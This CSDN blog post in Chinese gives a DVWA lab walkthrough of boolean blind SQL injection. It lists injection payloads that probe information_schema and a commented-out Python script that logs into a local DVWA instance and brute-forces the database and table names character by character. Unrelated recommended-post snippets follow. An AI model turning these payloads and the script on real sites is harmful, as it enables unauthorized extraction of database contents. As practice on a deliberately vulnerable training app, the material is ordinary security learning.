2021-01-14

最新推荐文章于 2021-03-07 14:50:37 发布
最新推荐文章于 2021-03-07 14:50:37 发布
阅读量109 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36448110/article/details/112628623
版权

SQL注入 盲注 数据库 信息泄露 安全防护
关键词由CSDN通过智能技术生成 
在这里插入代码片
    #猜测表的个数,系统默认的information_schema下的TABLES里有各个数据库名(table_schema)和表名(table_name)的字段
        # 正确返回1,错误返回0
        # 1' and (select COUNT(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA='dvwa')=2#

    #猜测表长度,获取名字后length
        # LIMIT 0,1 就是LIMIT 1 取第一条,只写一个默认从索引0也就是第一个开始取,
        # 获取这个dvwa数据库的第一个表的名字长度
            # 1' and LENGTH((select TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='dvwa' LIMIT 0,1))=9#
            # select LENGTH((select TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='dvwa' LIMIT 1,1))

    #猜表的名字,获取;注意后面两个1,1是从第一个位置开始取一个数,前面的1,1是从第二个位置取一个数,limit索引是从0开始
        #1' and substring((select TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='dvwa' LIMIT 1,1),1,1)='u'#
        # select substring((select TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA='dvwa' LIMIT 1,1),1,1)='u'

    # 盲注例子:
        # import re
        #
        # import requests
        #
        # #1.请求获取hidden
        # def get_hidden(url='http://10.0.7.167/dvwa/login.php'):
        #     req=requests.session()
        #     ret=req.get(url)
        #     html=ret.text
        #     token=re.findall("<input type='hidden' name='user_token' value='(.+?)'", html)
        #     token=token[0]
        #
        #     login(token,req,url)
        #     update_sec(token,req)
        #     return req
        #
        # #2.登录
        # def login(token,req,url):
        #     logindata={
        #         'username': 'admin',
        #         'password': 'password',
        #         'Login': 'Login',
        #         'user_token': token
        #     }
        #     req.post(url,data=logindata)
        #
        # #3.修改安全等级
        # def update_sec(token,req):
        #     surl='http://10.0.7.167/dvwa/security.php'
        #     sedata={
        #         'security': 'low',
        #         'seclev_submit': 'Submit',
        #         'user_token': token
        #     }
        #     req.post(surl,data=sedata)
        #
        # #4.猜测数据库名字长度
        # def database_len(req):
        #     data_len=1
        #     for i in range(20):
        #         lenurl=f'http://10.0.7.167/dvwa/vulnerabilities/sqli_blind/?id=1%27+and+LENGTH%28DATABASE%28%29%29%3D{i}%23&Submit=Submit'
        #         retu=req.get(lenurl)
        #         if judge(retu.text):
        #             print(f'长度为{i}')
        #             data_len=i
        #     return data_len
        #
        # #5.猜数据库名字
        # def database_name(req,data_len):
        #     data_name1=''
        #     for i in range(1,data_len+1):
        #         str='abcdefghijklmnopqrstuvwxyz'
        #         for j in str:
        #             zimuurl=f'http://10.0.7.167/dvwa/vulnerabilities/sqli_blind/?id=1%27+and+substring%28database%28%29%2C{i}%2C1%29%3D%27{j}%27%23&Submit=Submit'
        #             retu2=req.get(zimuurl)
        #             if judge(retu2.text):
        #                 print(f'第{i}字母为:{j}')
        #                 data_name1 += j
        #     print(f'数据库名字{data_name1}')
        #     return data_name1
        #
        # #6.猜数据库里有多少个表;系统默认的information_schema下的TABLES里有各个数据库名(table_schema)和表名(table_name)的字段
        # def table_s(req,data_name1):
        #     table_sum=0
        #     for i in range(100):
        #         table_sum_url=f'http://10.0.7.167/dvwa/vulnerabilities/sqli_blind/?id=1%27+and+%28select+COUNT%28TABLE_NAME%29+FROM+' \
        #                       f'information_schema.TABLES+WHERE+TABLE_SCHEMA%3D%27{data_name1}%27%29%3D{i}%23&Submit=Submit'
        #         table_req=req.get(table_sum_url)
        #         if judge(table_req.text):
        #             print(f'表的个数是:{i}')
        #             table_sum=i
        #     return table_sum
        #
        # #7.猜表的名字长度和名字
        # def table_name_len(req,table_sum,data_name1):
        #     table_name_len=[]
        #     tablename=[]
        #     str2=''
        #     str1='abcdefghijklmnopqrstuvwxyz'
        #     for i in range(table_sum):
        #         #猜第i个表的名字长度
        #         for j in range(100):
        #             table_len_url=f'http://10.0.7.167/dvwa/vulnerabilities/sqli_blind/?id=1%27+and+LENGTH%28%28select+TABLE_NAME+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA%3D%27{data_name1}%27+LIMIT+{i}%2C1%29%29%3D{j}%23&Submit=Submit'
        #             table_len=req.get(table_len_url)
        #             if judge(table_len.text):
        #                 print(f'第{i+1}表名字的长度是:{j}')
        #                 table_name_len.append(j)
        #                 # 猜测i个表的名字
        #                 for s in range(1,j+1):
        #                     for r in str1:
        #                         table_name_url=f'http://10.0.7.167/dvwa/vulnerabilities/sqli_blind/?id=1%27+and+substring%28%28select+TABLE_NAME+FROM+information_schema.' \
        #                                        f'TABLES+WHERE+TABLE_SCHEMA%3D%27{data_name1}%27+LIMIT+{i}%2C1%29%2C{s}%2C1%29%3D%27{r}%27%23&Submit=Submit'
        #                         table_name=req.get(table_name_url)
        #                         if judge(table_name.text):
        #                             # print(f'第{i+1}表名字的长度是:{j};其名字第{s}个是{r}')
        #                             print(f'其名字第{s}个是{r}')
        #                             str2+=r
        #         tablename.append(str2)
        #         str2=''
        #     return tablename
        #
        # #共性是判断
        # def judge(flag_text):
        #     if 'User ID exists in the database' in flag_text:
        #         return True
        #     else:
        #         return False
        #
        # #调用显示
        # def display():
        #     #调用登录函数
        #     req=get_hidden()
        #
        #     #调用猜测函数长度,名字等
        #     data_len=database_len(req)
        #     data_name1=database_name(req,data_len)
        #     table_sum=table_s(req,data_name1)
        #     tablename=table_name_len(req,table_sum,data_name1)
        #
        #     print(f'数据库的名字是:{data_name1}')
        #     print(f'表的名字是:{tablename}')
        #
        #     return data_name1,tablename
        #
        #
        # if __name__ == '__main__':
        #     print('---------------------------------------')
        #     data_name1,tablename=display()
        #
        #
[HACK学习呀] - 2021-01-14 柠檬鸭组织样本分析1
08-03
本文将深入探讨在【标题】"2021-01-14 柠檬鸭组织样本分析1"及【描述】中提及的恶意活动。这个样本涉及到一系列的命令行操作,旨在创建持久性机制、开放网络端口并执行远程控制任务。以下是这些操作的详细解析: ...
Test_2021-01-14.rar
01-15
参考博客: 【cxfreeze】 打包cv.dnn.readNet(xml,bin)推理代码 ...压缩包解压后为:openvino_demo文件夹、python-3.6.8-amd64.exe安装包、w_openvino_toolkit_p_2020.4.287.exe安装包.
2021-01-04
wubaoyu123的博客
01-04 2296
博客园Logo 首页 新闻 博问 专区 闪存 班级 代码改变世界 搜索 注册 登录 返回主页 知了一笑 博客园 首页 新随笔 联系 订阅 管理 数据仓库组件:Hive环境搭建和基础用法 本文源码:GitHub || GitEE 一、Hive基础简介 1、基础描述 Hive是基于Hadoop的一个数据仓库工具,用来进行数据提取、转化、加载,是一个可以对Hadoop中的大规模存储的数据进行查询和分析存储的组件,Hive数据仓库工具能将结构化的数据文件映射为一张数据库表,并提供SQL查询功能,能将SQL语句转变成
2021-01-10
qq_22667507的博客
01-10 1052
jupyter notebook中直接安装python的第三方库。 例如安装pymysql : ! pip install pymysql。 升级pip:
2021-01-08
weixin_45404781的博客
01-08 965
typedef struct tagCOPYDATASTRUCT { DWORD dwData; //用户自定义字段 DWORD cbData; //数据长度 PVOID lpData; //内容指针 } COPYDATASTRUCT;
2021-01-15
hikarilee的博客
01-15 1300
git clone 操作出现 fatal:index-pack failed 此错误为当前克隆文件夹属性只读,将只读取消
2021-02-01 (数组)
qq_51332937的博客
02-01 851
数组 稀疏矩阵 结果:
时间格式:2021-01-01T14:22:39-05:00
weixin_42087001的博客
01-15 6741
涉及到跨国项目 时间格式要存时区 北京时区是+8000
2021-01-14 OpenOffice安装
图图是只猫
01-14 1746
下载Oppenoffice 官网地址 安装 解压 tar -xvf Apache_OpenOffice_4.1.3.tar.gz -C /TRS/APP cd 进入解压目录.进入zh-CN目录执行: rpm -ivh *.rpm 进入openoffice目录 cd /opt/openoffice4/program/ 更新 yum install libXext.x86_64 yum groupinstall "X Window System" 开启防火墙端口 systemctl start fire
年 - 月 - 日 小时 : 分钟 : 秒 (例:2021-01-01 00:00:00 ) 的时间转换格式
Wancc123的博客
03-07 4040
格式化日期 格式为:年 - 月 - 日 小时 :分钟 :秒 (2021-01-01 00:00:00) const queryGetDateFunc = (day) => { let date = new Date(day); let Y = date.getFullYear(); let M = date.getMonth() + 1 > 9 ? date.getMonth() : '0' + date.getMonth();...
2021-01-14 Centos7安装 ImageMagic
图图是只猫
01-14 2078
ImageMagic 友情提醒:使用rpm包请谨慎行事 yum安装前置包 yum install zlib yum install jpegsrc yum install libpng yum install libpng-devel yum install freetype 下载 ImageMagick tar 包,一定是tar包不是rpm 解压 压缩包 到一个临时创建的目录 tar -xvf ImageMagick.tar.gz cd进入解压的目录 执行编译命令 ./configure --pref
2021-01-14 ElasticSearch5.6 安装
图图是只猫
01-14 1811
ElasticSearch下载 wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.6.16.zip ElasticSearch安装 解压 tar -xvf elasticsearch-5.5.0.tar.gz ElasticSearch配置 新建es用户 useradd es 设置密码 passwd es 修改最大连接数 vim /etc/sysctl.conf 加入如下内容: vm.max_map_c
AuditSearch2021-01-07_14-37-20_flash源码_
10-01
标题中的"AuditSearch2021-01-07_14-37-20_flash源码_"似乎是一个审计搜索的结果,日期为2021年1月7日,时间是下午2点37分,关键词是"flash源码"。这表明这是一个与Flash编程相关的源代码文件集合,可能包含用于分析...
技术资料分享nRF24L01P(新版无线模块控制IC)很好的技术资料.zip
11-08
技术资料分享nRF24L01P(新版无线模块控制IC)很好的技术资料.zip
C++ 课程设计项目,基于 Qt 制作的经典小游戏愤怒的小鸟 FlappyBird源代码
11-08
C++ 课程设计项目,基于 Qt 制作的经典小游戏愤怒的小鸟 FlappyBird源代码 点击屏幕使小鸟向上飞行 不要让小鸟撞到障碍物
控件以及双指放大缩小图片、单指拖动图片.zip
11-08
内容概要:本资源聚焦 Android 编程实战,包含毕业设计示例、完整的 Android 项目源码及文档分享。采用 MVC 模式进行架构设计,结合 JSP 技术与 SQL Server 2000 数据库管理系统,实现高效的 Android 应用开发。 适用人群:Android 开发初学者、计算机专业学生进行毕业设计参考、希望提升 Android 开发技能的程序员。 实用场景及目标:适用于开发各类 Android 应用项目,帮助开发者快速构建稳定、功能丰富的应用程序,同时为毕业设计提供优质的模板和思路。 说明:资源提供了详细的代码注释和文档说明,方便学习者理解和上手,助力提升 Android 开发能力和项目实战经验。
【路径规划】基于matlab FMM快速行进法船舶路径规划【Matlab仿真 2291期】.md
11-08
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作
Python基于 YOLOv8 的甲骨文原始拓片图像单字分割识别模型源代码+使用说明
11-08
针对原始拓片图像中的甲骨文文字分割识别包括以下两个阶段: 目标检测:基于 YOLOv8 目标检测模型,对甲骨文文字所在的矩形区域进行提取。 字符识别:基于 YOLOv8 图像分类模型,对文字图像进行分类,判断该字形所代表的具体字符内容。 同时基于 PyQt5 制作了一个简单的识别器前端程序。 使用说明 首先安装环境依赖包,项目目前采用 ONNX Runtime 部署模型推理。 pip install -r requirements.txt 若需要使用 GPU 进行推理,则需要安装: pip install onnxruntime-gpu 可以在本项目 Releases 中下载我训练好的模型权重文件,解压到项目中相应的位置(位于 inferences/models/ 下),运行 main.py 即可。 python main.py
几种常见简单滤波器用于二维图像降噪,包括均值、中值、高斯、低通、双边滤波器,语言是python
最新发布
11-08
每个滤波器均打包在不同的文件之内,以其功能命名,有均值滤波器、中值滤波器、高斯滤波器、低通滤波器、双边滤波器。应用场景为二维mat矩阵,同理可扩展到任意二维图像降噪,读者仅需更改输入输出文件路径即可调用
已知data = [ ('2021-01-01 08:00', 15), ('2021-01-01 12:00', 18), ('2021-01-01 16:00', 20), ('2021-01-02 08:00', 14), ('2021-01-02 12:00', 17), ('2021-01-02 16:00', 19) ]请写出代码对data实现指数平滑
07-12
2021-01-02 08:00:00 14 16.125000 2021-01-02 12:00:00 17 16.562500 2021-01-02 16:00:00 19 17.781250 ``` 在上述代码中,我们使用`pd.DataFrame`将data转换为DataFrame,并将时间戳列设置为索引。然后,使用`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值